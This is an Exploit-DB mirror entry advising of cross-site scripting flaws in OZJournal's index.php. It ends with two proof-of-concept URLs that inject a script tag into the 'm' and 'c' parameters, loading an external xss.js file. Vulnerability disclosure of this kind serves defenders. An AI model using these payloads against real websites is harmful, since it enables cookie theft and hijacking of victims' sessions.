exploit-db-mirror/platforms/php/webapps/28325.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

8 lines
No EOL
766 B
Text
Executable file

source: http://www.securityfocus.com/bid/19311/info
OZJournal is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/index.php?show=archives&y=2006&m=<script%20src=http://www.example.com/xss.js></script>
http://www.example.com/index.php?show=archives&c=http://www.example.com/index.php?show=archives&c=<script%20src=http://www.example.com/xss.js></script>